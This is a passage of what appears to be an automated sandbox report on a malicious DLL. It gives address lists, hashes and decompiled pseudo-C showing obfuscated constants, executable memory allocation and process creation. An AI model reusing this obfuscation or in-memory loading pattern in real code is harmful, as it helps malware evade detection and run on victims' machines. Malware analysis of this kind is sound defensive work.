0x10017fb8
0x10017fbd
0x10017fc5
0x10017fcd
0x10017fd5
0x10017fe2
0x10017fe6
0x10017fee
0x10017ff6
0x10017ffb
0x10018000
0x10018005
0x1001800d
0x1001801a
0x1001801e
0x10018026
0x1001802e
0x10018036
0x1001803b
0x10018043
0x1001804b
0x10018053
0x1001805b
0x10018060
0x10018065
0x1001806a
0x10018072
0x1001807a
0x1001807f
0x10018087
0x1001808f
0x10018097
0x100180a4
0x100180ad
0x100180b1
0x100180b9
0x100180c1
0x100180cc
0x100180d7
0x100180df
0x100180ea
0x100180f2
0x100180fc
0x10018100
0x10018108
0x10018110
0x10018118
0x1001811d
0x10018125
0x1001812d
0x10018135
0x1001813d
0x10018147
0x10018152
0x1001815d
0x10018165
0x10018170
0x10018184
0x10018189
0x10018192
0x1001819d
0x100181a5
0x100181b1
0x100181b4
0x100181b8
0x100181c0
0x100181c8
0x100181db
0x100181e2
0x100181ed
0x100181f8
0x10018203
0x1001820e
0x10018216
0x1001821b
0x10018223
0x1001822b
0x10018236
0x10018241
0x1001824c
0x10018254
0x1001825c
0x10018261
0x10018269
0x10018271
0x10018279
0x10018281
0x10018286
0x1001828e
0x1001829b
0x1001829f
0x100182a7
0x100182af
0x100182b7
0x100182c2
0x100182cd
0x100182d8
0x100182df
0x100182ea
0x100182f2
0x100182fd
0x1001830a
0x1001830e
0x10018313
0x1001831b
0x10018326
0x10018331
0x1001833c
0x1001834e
0x10018487
0x10018489
0x1001848d
0x1001848f
0x10018493
0x10018495
0x100184aa
0x100184aa
0x100184ad
0x100184b0
0x100184b3
0x00000000
0x00000000
0x1001849e
0x100184a2
0x100184a4
0x100184a7
0x100184a7
0x00000000
0x100184a7
0x00000000
0x100184a2
0x100184b5
0x100184b5
0x100184b7
0x100184b7
0x100184ba
0x100184bd
0x100184bd
0x100184c2
0x00000000
0x10018354
0x1001835a
0x1001847b
0x1001847d
0x00000000
0x10018360
0x10018366
0x10018548
0x1001854f
0x10018550
0x10018551
0x10018552
0x10018556
0x10018568
0x10018569
0x1001856a
0x10018574
0x10018574
0x1001836c
0x10018372
0x1001845e
0x10018464
0x10018465
0x00000000
0x10018378
0x10018378
0x1001837e
0x1001853a
0x1001853a
0x10018540
0x00000000
0x00000000
0x10018546
0x10018384
0x10018384
0x100183a6
0x100183c2
0x100183c7
0x100183cc
0x1001841c
0x10018431
0x10018438
0x1001843d
0x10018440
0x00000000
0x10018440
0x1001837e
0x10018372
0x10018366
0x1001835a
0x10018581
0x10018581
0x100184cc
0x100184d1
0x10018504
0x10018515
0x10018528
0x1001852c
0x1001852c
0x10018532
0x10018537
0x00000000

Strings

9I, xrefs: 10017E7B
#1, xrefs: 10017DFD
s-, xrefs: 10018313
x<N, xrefs: 1001847D
2V, xrefs: 1001806A
@;, xrefs: 10017DC2
\C, xrefs: 10018147
bC, xrefs: 100182B7
X, xrefs: 10018192
=[, xrefs: 10017DA5
cY, xrefs: 1001820E
BS, xrefs: 10018271
%D, xrefs: 10017F94
x<N, xrefs: 10018348

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #1$%D$2V$9I$=[$@;$\C$bC$cY$s-$x<N$x<N$BS$X
API String ID: 0-3306313712
Opcode ID: 24a479cb9960130481b5e0a16401e8a496e826423d3935e462d2cd1cf3aa2df0
Instruction ID: 6a1dd99ac0dae1f7e91fa6a7f4389cb019a1ae11d87d1325dd7d5c9d98885180
Opcode Fuzzy Hash: 24a479cb9960130481b5e0a16401e8a496e826423d3935e462d2cd1cf3aa2df0
Instruction Fuzzy Hash: 061223715093819FE3A4CF25C94AA4BBBF1FBC1748F50891DE1D9862A0D7B59A49CF03

Uniqueness

Uniqueness Score: -1.00%

Function 100189F6, Relevance: 1.4, Strings: 1, Instructions: 178
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E100189F6(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _t179;
				void* _t198;
				void* _t199;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				intOrPtr _t230;
				signed int _t233;
				intOrPtr* _t236;
				void* _t237;

				_t236 = _t237 - 0x58;
				_push( *((intOrPtr*)(_t236 + 0x7c)));
				_t230 =  *((intOrPtr*)(_t236 + 0x60));
				_push( *((intOrPtr*)(_t236 + 0x78)));
				_push( *((intOrPtr*)(_t236 + 0x74)));
				_push(0);
				_push( *((intOrPtr*)(_t236 + 0x6c)));
				_push( *((intOrPtr*)(_t236 + 0x68)));
				_push( *((intOrPtr*)(_t236 + 0x64)));
				_push(_t230);
				_push(__edx);
				_t179 = E100056B2(0);
				 *((intOrPtr*)(_t236 + 0x10)) = _t179;
				 *((intOrPtr*)(_t236 + 0x14)) = _t179;
				 *((intOrPtr*)(_t236 + 0xc)) = 0x631fbb;
				 *(_t236 + 0x18) = 0xabd8;
				 *(_t236 + 0x18) =  *(_t236 + 0x18) >> 0xa;
				 *(_t236 + 0x18) =  *(_t236 + 0x18) ^ 0x000028bc;
				 *(_t236 + 0x50) = 0x6039;
				 *(_t236 + 0x50) =  *(_t236 + 0x50) >> 3;
				 *(_t236 + 0x50) =  *(_t236 + 0x50) + 0xffff0189;
				 *(_t236 + 0x50) =  *(_t236 + 0x50) | 0x7d810f7b;
				 *(_t236 + 0x50) =  *(_t236 + 0x50) ^ 0xffff162f;
				 *(_t236 + 0x28) = 0x1c47;
				 *(_t236 + 0x28) =  *(_t236 + 0x28) >> 0xc;
				 *(_t236 + 0x28) =  *(_t236 + 0x28) ^ 0x0000518a;
				 *(_t236 + 0x54) = 0x88f7;
				_t204 = 0x7a;
				 *(_t236 + 0x54) =  *(_t236 + 0x54) / _t204;
				_t205 = 0x2f;
				 *(_t236 + 0x54) =  *(_t236 + 0x54) / _t205;
				 *(_t236 + 0x54) =  *(_t236 + 0x54) | 0x955efb45;
				 *(_t236 + 0x54) =  *(_t236 + 0x54) ^ 0x955eaba7;
				 *(_t236 + 0x34) = 0x5d88;
				 *(_t236 + 0x34) =  *(_t236 + 0x34) | 0x01d5b93d;
				 *(_t236 + 0x34) =  *(_t236 + 0x34) + 0xffff1061;
				 *(_t236 + 0x34) =  *(_t236 + 0x34) ^ 0x01d50dda;
				 *(_t236 + 0x20) = 0xe64c;
				_t206 = 0x3c;
				 *(_t236 + 0x20) =  *(_t236 + 0x20) * 0x1a;
				 *(_t236 + 0x20) =  *(_t236 + 0x20) ^ 0x00172033;
				 *(_t236 + 0x48) = 0x78d;
				 *(_t236 + 0x48) =  *(_t236 + 0x48) >> 5;
				 *(_t236 + 0x48) =  *(_t236 + 0x48) >> 3;
				 *(_t236 + 0x48) =  *(_t236 + 0x48) << 7;
				 *(_t236 + 0x48) =  *(_t236 + 0x48) ^ 0x00004d2d;
				 *(_t236 + 0x40) = 0xdd42;
				 *(_t236 + 0x40) =  *(_t236 + 0x40) | 0x71435ab3;
				 *(_t236 + 0x40) =  *(_t236 + 0x40) >> 3;
				 *(_t236 + 0x40) =  *(_t236 + 0x40) >> 3;
				 *(_t236 + 0x40) =  *(_t236 + 0x40) ^ 0x01c527a4;
				 *(_t236 + 0x1c) = 0xfe37;
				 *(_t236 + 0x1c) =  *(_t236 + 0x1c) / _t206;
				 *(_t236 + 0x1c) =  *(_t236 + 0x1c) ^ 0x00000b23;
				 *(_t236 + 0x44) = 0x813f;
				 *(_t236 + 0x44) =  *(_t236 + 0x44) + 0x228;
				 *(_t236 + 0x44) =  *(_t236 + 0x44) + 0xffff0885;
				 *(_t236 + 0x44) =  *(_t236 + 0x44) ^ 0xc0b9d21a;
				 *(_t236 + 0x44) =  *(_t236 + 0x44) ^ 0x3f462949;
				 *(_t236 + 0x30) = 0xaa8;
				 *(_t236 + 0x30) =  *(_t236 + 0x30) + 0xffffc1ea;
				 *(_t236 + 0x30) =  *(_t236 + 0x30) + 0xcc5a;
				 *(_t236 + 0x30) =  *(_t236 + 0x30) ^ 0x0000b9ca;
				 *(_t236 + 0x4c) = 0xb208;
				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) * 0x21;
				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) ^ 0x1e109f47;
				_t233 = 0x44;
				_t207 = 0x22;
				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) * 0xb;
				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) ^ 0x4a46f378;
				 *(_t236 + 0x24) = 0x5fb2;
				 *(_t236 + 0x24) =  *(_t236 + 0x24) >> 6;
				 *(_t236 + 0x24) =  *(_t236 + 0x24) ^ 0x00007116;
				 *(_t236 + 0x2c) = 0x59ee;
				 *(_t236 + 0x2c) =  *(_t236 + 0x2c) << 0xb;
				 *(_t236 + 0x2c) =  *(_t236 + 0x2c) / _t233;
				 *(_t236 + 0x2c) =  *(_t236 + 0x2c) ^ 0x000a9b68;
				 *(_t236 + 0x38) = 0x60ae;
				 *(_t236 + 0x38) =  *(_t236 + 0x38) / _t207;
				 *(_t236 + 0x38) =  *(_t236 + 0x38) << 1;
				 *(_t236 + 0x38) =  *(_t236 + 0x38) ^ 0x00001475;
				 *(_t236 + 0x3c) = 0x510d;
				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) << 0xb;
				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) | 0x23cc3b8a;
				_t208 = 0x4c;
				_t149 = _t236 - 0x48; // 0xfffec844
				_t209 = _t149;
				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) / _t208;
				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) ^ 0x0078f0f6;
				E10001CB3(_t149,  *(_t236 + 0x18), _t233,  *(_t236 + 0x50));
				 *(_t236 - 0x48) = _t233;
				_t156 = _t236 - 4; // 0xfffec888
				_t158 = _t236 - 0x48; // 0xfffec844
				_t198 = E1001F2F9( *(_t236 + 0x28), _t149,  *((intOrPtr*)(_t236 + 0x64)),  *((intOrPtr*)(_t236 + 0x74)),  *((intOrPtr*)(_t236 + 0x78)), _t158,  *(_t236 + 0x54),  *(_t236 + 0x34), _t209,  *(_t236 + 0x20),  *(_t236 + 0x48),  *(_t236 + 0x40), _t209, _t209, _t156); // executed
				if(_t198 == 0) {
					_t199 = 0;
				} else {
					if(_t230 == 0) {
						E100078F0( *((intOrPtr*)(_t236 - 4)),  *(_t236 + 0x1c),  *(_t236 + 0x44),  *(_t236 + 0x30),  *(_t236 + 0x4c));
						E100078F0( *_t236,  *(_t236 + 0x24),  *(_t236 + 0x2c),  *(_t236 + 0x38),  *(_t236 + 0x3c));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t199 = 1;
				}
				return _t199;
			}

0x100189f7
0x10018a03
0x10018a06
0x10018a0b
0x10018a0e
0x10018a11
0x10018a12
0x10018a15
0x10018a18
0x10018a1b
0x10018a1c
0x10018a1e
0x10018a23
0x10018a28
0x10018a2b
0x10018a32
0x10018a39
0x10018a3d
0x10018a44
0x10018a4b
0x10018a4f
0x10018a56
0x10018a5d
0x10018a64
0x10018a6b
0x10018a6f
0x10018a76
0x10018a82
0x10018a87
0x10018a8f
0x10018a94
0x10018a99
0x10018aa0
0x10018aa7
0x10018aae
0x10018ab5
0x10018abc
0x10018ac3
0x10018ace
0x10018acf
0x10018ad2
0x10018ad9
0x10018ae0
0x10018ae4
0x10018ae8
0x10018aec
0x10018af3
0x10018afa
0x10018b01
0x10018b05
0x10018b09
0x10018b10
0x10018b1c
0x10018b1f
0x10018b26
0x10018b2d
0x10018b34
0x10018b3b
0x10018b42
0x10018b49
0x10018b50
0x10018b57
0x10018b5e
0x10018b65
0x10018b70
0x10018b75
0x10018b82
0x10018b85
0x10018b86
0x10018b89
0x10018b90
0x10018b97
0x10018b9b
0x10018ba2
0x10018ba9
0x10018bb4
0x10018bb7
0x10018bbe
0x10018bcc
0x10018bd1
0x10018bd4
0x10018bdb
0x10018be2
0x10018be6
0x10018bf0
0x10018bf3
0x10018bf3
0x10018bf6
0x10018bf9
0x10018c07
0x10018c0f
0x10018c12
0x10018c1b
0x10018c39
0x10018c43
0x10018c82
0x10018c45
0x10018c47
0x10018c64
0x10018c78
0x10018c49
0x10018c4c
0x10018c4d
0x10018c4e
0x10018c4f
0x10018c4f
0x10018c52
0x10018c52
0x10018c8a

Strings

I)F?, xrefs: 10018B42

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: I)F?
API String ID: 963392458-3766579322
Opcode ID: 9f0cb1b32e5b959dd6c64c6faedf6d3f6da1e1247f9cda7a21d2f129803ffcb6
Instruction ID: ef7d14b34603df108970e56650a302b1bb14d782bbbedb86e73a05816f7f5754
Opcode Fuzzy Hash: 9f0cb1b32e5b959dd6c64c6faedf6d3f6da1e1247f9cda7a21d2f129803ffcb6
Instruction Fuzzy Hash: 8681E172500248EBEF59CF65C9498CE3BB2FF44348F009219FE15962A0D7BAD999CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00210530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00210575
UnmapViewOfFile.KERNELBASE(?), ref: 00210625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0021063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 00210770

Memory Dump Source

Source File: 00000007.00000002.2097286089.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 12da7ea77053d9a4454a67c47f97abb959356eab343d44c8e8639802e2d4a6cd
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: A5B198B4E00109DFCB48CF94C591AAEB7B5BF98304F208159E919AB345D775EE92CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0020FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0020FFD4

Strings

VirtualAlloc, xrefs: 0020FFB9, 0020FFBC

Memory Dump Source

Source File: 00000007.00000002.2097286089.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: 83315a3cf3cf2dacbed528e6ed80a8dc6b12b11bad318e9238a6ee6467b7b864
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: FA113060D08389DEEB01D7E884097EFBFB55B21704F044098E6446A282D2BA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Function 1001F2F9, Relevance: 1.6, APIs: 1, Instructions: 72
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 30%

			E1001F2F9(void* __edx, WCHAR* _a8, WCHAR* _a12, int _a16, struct _STARTUPINFOW* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, struct _PROCESS_INFORMATION* _a56) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t64;
				signed int _t65;

				_push(_a56);
				_push(0);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				E100056B2(_t54);
				_v28 = 0x170c99;
				_v24 = 0;
				_v16 = 0x438d;
				_v16 = _v16 ^ 0x1c0fc040;
				_v16 = _v16 + 0xffffa13b;
				_v16 = _v16 ^ 0x1c0f1065;
				_v8 = 0x7b12;
				_v8 = _v8 + 0xe48b;
				_v8 = _v8 << 2;
				_t65 = 0x70;
				_push(0xf9b1620b);
				_v8 = _v8 * 0x77;
				_v8 = _v8 ^ 0x028dd8b4;
				_v20 = 0x8aa6;
				_v20 = _v20 + 0x376a;
				_v20 = _v20 ^ 0x0000ade9;
				_v12 = 0x19;
				_push(0x90aa198d);
				_v12 = _v12 / _t65;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x00005708;
				E100104D5(0x2ee, _v12 % _t65);
				_t64 = CreateProcessW(_a8, _a12, 0, 0, _a16, 0, 0, 0, _a20, _a56); // executed
				return _t64;
			}

0x1001f300
0x1001f305
0x1001f306
0x1001f307
0x1001f30a
0x1001f30d
0x1001f310
0x1001f311
0x1001f314
0x1001f317
0x1001f31a
0x1001f31d
0x1001f320
0x1001f323
0x1001f325
0x1001f326
0x1001f32b
0x1001f335
0x1001f33a
0x1001f341
0x1001f348
0x1001f34f
0x1001f356
0x1001f35d
0x1001f364
0x1001f36e
0x1001f36f
0x1001f377
0x1001f37a
0x1001f381
0x1001f388
0x1001f38f
0x1001f396
0x1001f3a2
0x1001f3a7
0x1001f3af
0x1001f3b3
0x1001f3c6
0x1001f3e2
0x1001f3e8

APIs

CreateProcessW.KERNEL32(1C0F1065,0000ADE9,00000000,00000000,?,00000000,00000000,00000000,00170C99,?), ref: 1001F3E2

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b82141c95acb57d60d751e5f2e4688589f7e44b0fc75a65c2ccc181fdfee9b76
Instruction ID: c1c344a82ab6e6d2027d32389277b6a1f50d48e74316109c084eae58ace878c9
Opcode Fuzzy Hash: b82141c95acb57d60d751e5f2e4688589f7e44b0fc75a65c2ccc181fdfee9b76
Instruction Fuzzy Hash: 0731E072901218FBDF11DEA5C90A8DFBFB5FF08354F108188F91866260D3B68A64EF90

Uniqueness

Uniqueness Score: -1.00%

Function 10001D54, Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 10001E0C

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 64456d9c3409b7dfc98e3926f3940d727050098de397692e26eff1ef2f8fc9ff
Instruction ID: 5bb8887445c1fcdc0dfe7db06e2ae0198e54bbb703149daf8052fb5d5ae5edad
Opcode Fuzzy Hash: 64456d9c3409b7dfc98e3926f3940d727050098de397692e26eff1ef2f8fc9ff
Instruction Fuzzy Hash: 7D213371D01218ABDF01DFE4CC4A8DEBFB4FB05314F108088F91466260D3799A60DB91

Uniqueness

Uniqueness Score: -1.00%

Function 1000CD27, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 39%

			E1000CD27() {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _t48;

				_v20 = 0x9362;
				_v20 = _v20 << 3;
				_v20 = _v20 + 0x3ac5;
				_v20 = _v20 ^ 0x0004a93d;
				_v16 = 0x2d14;
				_v16 = _v16 | 0xd3f48c41;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x069fac5e;
				_v12 = 0xc5b1;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0x469c37c1;
				_t48 = 0x70;
				_push(0xf9b1620b);
				_v12 = _v12 / _t48;
				_v12 = _v12 ^ 0x00a22cf4;
				_v8 = 0x5bb6;
				_v8 = _v8 >> 4;
				_v8 = _v8 | 0x6c69259f;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0000087c;
				_push(0xa43506f8);
				E100104D5(0x16b, _v12 % _t48);
				ExitProcess(0);
			}

0x1000cd2d
0x1000cd36
0x1000cd3a
0x1000cd41
0x1000cd48
0x1000cd4f
0x1000cd56
0x1000cd5a
0x1000cd61
0x1000cd68
0x1000cd6c
0x1000cd78
0x1000cd7b
0x1000cd80
0x1000cd86
0x1000cd92
0x1000cd99
0x1000cd9d
0x1000cda4
0x1000cda8
0x1000cdbb
0x1000cdc0
0x1000cdca

APIs

ExitProcess.KERNEL32(00000000), ref: 1000CDCA

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 095d61fac8955b0d745090151c9d232a6e8b83d7772360794bde9b1750a1fa0c
Instruction ID: fd49a0ddf446a10eaf2e1d98cea76079db48582c58eb1e4a99496c5128524e9f
Opcode Fuzzy Hash: 095d61fac8955b0d745090151c9d232a6e8b83d7772360794bde9b1750a1fa0c
Instruction Fuzzy Hash: 76112775E0060CEBEB48DFE8C84A59EBBB0FB00708F108599D526A7294C3B55B88DF81

Uniqueness

Uniqueness Score: -1.00%

Function 1000D867, Relevance: 1.3, APIs: 1, Instructions: 44
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E1000D867(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t32;
				int _t39;
				void* _t41;
				WCHAR* _t43;

				_push(_a16);
				_t43 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t32);
				_v20 = 0xc112;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x00187660;
				_v16 = 0x44a2;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0x44a20c46;
				_v8 = 0x80d5;
				_v8 = _v8 << 6;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0x406aec0c;
				_v12 = 0x3c7d;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x000035cf;
				_push(0xf9b1620b);
				_push(0x903a0366);
				_t41 = 0x28;
				E100104D5(_t41, __edx);
				_t39 = lstrcmpiW(_a4, _t43); // executed
				return _t39;
			}

0x1000d86e
0x1000d871
0x1000d873
0x1000d876
0x1000d879
0x1000d87c
0x1000d87d
0x1000d87e
0x1000d883
0x1000d88d
0x1000d891
0x1000d898
0x1000d89f
0x1000d8a3
0x1000d8aa
0x1000d8b1
0x1000d8b5
0x1000d8b9
0x1000d8c0
0x1000d8c7
0x1000d8cb
0x1000d8de
0x1000d8e6
0x1000d8ed
0x1000d8ee
0x1000d8fa
0x1000d900

APIs

lstrcmpiW.KERNELBASE(000035CF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000D8FA

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 8f7063aac4a8c9182ba7432b9d57c55064d4a8a281301381b5e81462a188a855
Instruction ID: 8f5cadfe3fbd449c9d9c17bc6a6d8fcaa3f7433e09eb3b39b642844515f060d6
Opcode Fuzzy Hash: 8f7063aac4a8c9182ba7432b9d57c55064d4a8a281301381b5e81462a188a855
Instruction Fuzzy Hash: 29112376C01208BBEF41EFE4C90A8DEBBB4FB00354F108498E92566251D7B68B64DF81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1000DC2F, Relevance: 44.8, Strings: 35, Instructions: 1094
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E1000DC2F() {
				char _v68;
				intOrPtr _v72;
				char _v80;
				char _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				void* _v112;
				intOrPtr _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v144;
				char _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				unsigned int _v180;
				unsigned int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				unsigned int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				unsigned int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				unsigned int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				unsigned int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				unsigned int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				unsigned int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				unsigned int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				unsigned int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				intOrPtr _t1166;
				intOrPtr _t1180;
				intOrPtr _t1220;
				intOrPtr _t1265;
				void* _t1272;
				void* _t1277;
				intOrPtr _t1278;
				intOrPtr _t1284;
				signed int _t1286;
				signed int _t1287;
				signed int _t1299;
				signed int _t1310;
				signed int _t1316;
				signed int _t1391;
				signed int _t1392;
				void* _t1397;
				signed int _t1399;
				signed int _t1400;
				signed int _t1401;
				signed int _t1402;
				signed int _t1403;
				signed int _t1404;
				signed int _t1405;
				signed int _t1406;
				signed int _t1407;
				signed int _t1408;
				signed int _t1409;
				signed int _t1410;
				signed int _t1411;
				signed int _t1412;
				signed int _t1413;
				signed int _t1414;
				signed int _t1415;
				signed int _t1416;
				signed int _t1417;
				signed int _t1418;
				signed int _t1419;
				signed int _t1424;
				signed int _t1428;
				void* _t1430;
				void* _t1431;
				void* _t1433;
				void* _t1434;
				void* _t1435;

				_t1430 = (_t1428 & 0xfffffff8) - 0x268;
				_v240 = 0xe54f;
				_v240 = _v240 << 1;
				_t1290 = 0x24211e99;
				_v240 = _v240 ^ 0x0001b603;
				_v400 = 0x34e4;
				_v400 = _v400 | 0x72f16b66;
				_v400 = _v400 ^ 0x4462d2ae;
				_v400 = _v400 ^ 0x36938c8e;
				_v616 = 0x6c80;
				_t1399 = 0x17;
